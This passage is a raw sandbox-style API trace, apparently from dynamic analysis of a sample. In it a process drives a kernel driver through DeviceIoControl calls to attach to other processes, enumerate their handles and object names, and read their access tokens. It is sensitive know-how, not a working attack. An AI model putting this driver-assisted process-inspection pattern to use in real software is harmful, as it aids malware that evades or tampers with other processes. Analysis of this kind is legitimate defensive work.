[0246.578] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.580] CloseHandle (hObject=0xc4) returned 1 [0246.580] CloseHandle (hObject=0xc8) returned 1 [0246.580] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.580] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0246.580] PsLookupProcessByProcessId (in: ProcessId=0xa4c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.580] PsAcquireProcessExitSynchronization () returned 0x0 [0246.580] KeStackAttachProcess (in: PROCESS=0xfffffa800202c060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800202c060, ApcState=0xfffff880053c85d0) [0246.580] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f0c7d0, HandleInformation=0x0) returned 0x0 [0246.580] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.580] PsReleaseProcessExitSynchronization () returned 0x2 [0246.580] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x1e [0246.580] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003088044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003088044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.580] ObfDereferenceObject (Object=0xfffffa8001f0c7d0) returned 0x1 [0246.580] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.580] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.580] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.580] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0246.580] PsLookupProcessByProcessId (in: ProcessId=0xa4c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.580] PsAcquireProcessExitSynchronization () returned 0x0 [0246.580] KeStackAttachProcess (in: PROCESS=0xfffffa800202c060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800202c060, ApcState=0xfffff880053c85d0) [0246.580] ObReferenceObjectByHandle (in: Handle=0x24, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80021a3b20, HandleInformation=0x0) returned 0x0 [0246.580] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.580] PsReleaseProcessExitSynchronization () returned 0x2 [0246.581] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x1e [0246.581] ObQueryNameString (in: Object=0xfffffa80021a3b20, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.581] ObfDereferenceObject (Object=0xfffffa80021a3b20) returned 0x1 [0246.581] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.581] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.581] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.581] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.581] PsLookupProcessByProcessId (in: ProcessId=0xa4c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.581] PsAcquireProcessExitSynchronization () returned 0x0 [0246.581] KeStackAttachProcess (in: PROCESS=0xfffffa800202c060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800202c060, ApcState=0xfffff880053c85d0) [0246.581] ObReferenceObjectByHandle (in: Handle=0x78, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.581] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.581] PsReleaseProcessExitSynchronization () returned 0x2 [0246.581] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x1e [0246.581] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.581] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x51 [0246.581] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.581] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.581] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.581] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0246.581] PsLookupProcessByProcessId (in: ProcessId=0xa4c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.581] PsAcquireProcessExitSynchronization () returned 0x0 [0246.581] KeStackAttachProcess (in: PROCESS=0xfffffa800202c060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800202c060, ApcState=0xfffff880053c85d0) [0246.581] ObReferenceObjectByHandle (in: Handle=0xa4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001e99070, HandleInformation=0x0) returned 0x0 [0246.582] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.582] PsReleaseProcessExitSynchronization () returned 0x2 [0246.582] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x1e [0246.582] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.582] ObfDereferenceObject (Object=0xfffffa8001e99070) returned 0x1 [0246.582] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.582] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.582] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.582] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.582] PsLookupProcessByProcessId (in: ProcessId=0xa4c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.582] PsAcquireProcessExitSynchronization () returned 0x0 [0246.582] KeStackAttachProcess (in: PROCESS=0xfffffa800202c060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800202c060, ApcState=0xfffff880053c85d0) [0246.582] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00109f320, HandleInformation=0x0) returned 0x0 [0246.582] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.582] PsReleaseProcessExitSynchronization () returned 0x2 [0246.582] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x1e [0246.582] ObQueryNameString (in: Object=0xfffff8a00109f320, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.582] ObfDereferenceObject (Object=0xfffff8a00109f320) returned 0x1 [0246.582] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.582] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.582] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.582] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0246.582] PsLookupProcessByProcessId (in: ProcessId=0xa4c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.582] PsAcquireProcessExitSynchronization () returned 0x0 [0246.582] KeStackAttachProcess (in: PROCESS=0xfffffa800202c060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800202c060, ApcState=0xfffff880053c85d0) [0246.583] ObReferenceObjectByHandle (in: Handle=0xac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a23250, HandleInformation=0x0) returned 0x0 [0246.583] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.583] PsReleaseProcessExitSynchronization () returned 0x2 [0246.583] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x1e [0246.583] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.583] ObfDereferenceObject (Object=0xfffffa8003a23250) returned 0x1 [0246.583] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.583] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.583] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.583] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0246.583] PsLookupProcessByProcessId (in: ProcessId=0xa4c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.583] PsAcquireProcessExitSynchronization () returned 0x0 [0246.583] KeStackAttachProcess (in: PROCESS=0xfffffa800202c060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800202c060, ApcState=0xfffff880053c85d0) [0246.583] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002814f20, HandleInformation=0x0) returned 0x0 [0246.583] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.583] PsReleaseProcessExitSynchronization () returned 0x2 [0246.583] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x1e [0246.583] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.583] ObfDereferenceObject (Object=0xfffffa8002814f20) returned 0x1 [0246.583] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.583] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.583] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.583] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0246.583] PsLookupProcessByProcessId (in: ProcessId=0xa4c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.584] PsAcquireProcessExitSynchronization () returned 0x0 [0246.584] KeStackAttachProcess (in: PROCESS=0xfffffa800202c060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800202c060, ApcState=0xfffff880053c85d0) [0246.584] ObReferenceObjectByHandle (in: Handle=0xd4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0246.584] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.584] PsReleaseProcessExitSynchronization () returned 0x2 [0246.584] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x1e [0246.584] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.584] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0246.584] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.584] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.584] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.584] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x82, lpOverlapped=0x0) returned 1 [0246.584] PsLookupProcessByProcessId (in: ProcessId=0xa4c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.584] PsAcquireProcessExitSynchronization () returned 0x0 [0246.584] KeStackAttachProcess (in: PROCESS=0xfffffa800202c060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800202c060, ApcState=0xfffff880053c85d0) [0246.584] ObReferenceObjectByHandle (in: Handle=0xd8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80019db970, HandleInformation=0x0) returned 0x0 [0246.584] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.584] PsReleaseProcessExitSynchronization () returned 0x2 [0246.584] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x1e [0246.584] ObQueryNameString (in: Object=0xfffffa80019db970, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.584] ObfDereferenceObject (Object=0xfffffa80019db970) returned 0x1 [0246.584] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.584] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.584] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.585] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0246.585] PsLookupProcessByProcessId (in: ProcessId=0xa4c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.585] PsAcquireProcessExitSynchronization () returned 0x0 [0246.585] KeStackAttachProcess (in: PROCESS=0xfffffa800202c060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800202c060, ApcState=0xfffff880053c85d0) [0246.585] ObReferenceObjectByHandle (in: Handle=0xe4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0246.585] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.585] PsReleaseProcessExitSynchronization () returned 0x2 [0246.585] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x1e [0246.585] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.585] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0246.585] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.585] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.585] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.585] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0246.585] PsLookupProcessByProcessId (in: ProcessId=0xa4c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.585] PsAcquireProcessExitSynchronization () returned 0x0 [0246.585] KeStackAttachProcess (in: PROCESS=0xfffffa800202c060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800202c060, ApcState=0xfffff880053c85d0) [0246.585] ObReferenceObjectByHandle (in: Handle=0xf0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000fa9eb0, HandleInformation=0x0) returned 0x0 [0246.585] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.585] PsReleaseProcessExitSynchronization () returned 0x2 [0246.585] ObfDereferenceObject (Object=0xfffffa800202c060) returned 0x1e [0246.585] ObQueryNameString (in: Object=0xfffff8a000fa9eb0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.585] ObfDereferenceObject (Object=0xfffff8a000fa9eb0) returned 0xa [0246.585] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.585] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x534) returned 0xc8 [0246.586] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.586] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8001e9eb30, HandleInformation=0x0) returned 0x0 [0246.586] ObOpenObjectByPointer (in: Object=0xfffffa8001e9eb30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.586] ObfDereferenceObject (Object=0xfffffa8001e9eb30) returned 0x3d [0246.586] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8003ab1940 | out: TokenHandle=0xfffffa8003ab1940*=0xc4) returned 0x0 [0246.586] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.586] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.586] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.586] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.588] CloseHandle (hObject=0xc4) returned 1 [0246.588] CloseHandle (hObject=0xc8) returned 1 [0246.588] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.588] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.588] PsLookupProcessByProcessId (in: ProcessId=0x534, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.588] PsAcquireProcessExitSynchronization () returned 0x0 [0246.588] KeStackAttachProcess (in: PROCESS=0xfffffa8001e9eb30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001e9eb30, ApcState=0xfffff880053c85d0) [0246.588] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002167f20, HandleInformation=0x0) returned 0x0 [0246.588] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.588] PsReleaseProcessExitSynchronization () returned 0x2 [0246.589] ObfDereferenceObject (Object=0xfffffa8001e9eb30) returned 0x3b [0246.589] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.589] ObfDereferenceObject (Object=0xfffffa8002167f20) returned 0x1 [0246.589] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.589] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.589] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.589] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0246.589] PsLookupProcessByProcessId (in: ProcessId=0x534, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.589] PsAcquireProcessExitSynchronization () returned 0x0 [0246.589] KeStackAttachProcess (in: PROCESS=0xfffffa8001e9eb30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001e9eb30, ApcState=0xfffff880053c85d0) [0246.589] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80027e1f20, HandleInformation=0x0) returned 0x0 [0246.589] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.589] PsReleaseProcessExitSynchronization () returned 0x2 [0246.589] ObfDereferenceObject (Object=0xfffffa8001e9eb30) returned 0x3b [0246.589] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.589] ObfDereferenceObject (Object=0xfffffa80027e1f20) returned 0x1 [0246.589] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.589] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.589] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.589] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0246.589] PsLookupProcessByProcessId (in: ProcessId=0x534, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.589] PsAcquireProcessExitSynchronization () returned 0x0 [0246.589] KeStackAttachProcess (in: PROCESS=0xfffffa8001e9eb30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001e9eb30, ApcState=0xfffff880053c85d0) [0246.589] ObReferenceObjectByHandle (in: Handle=0x198, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001e8d9e0, 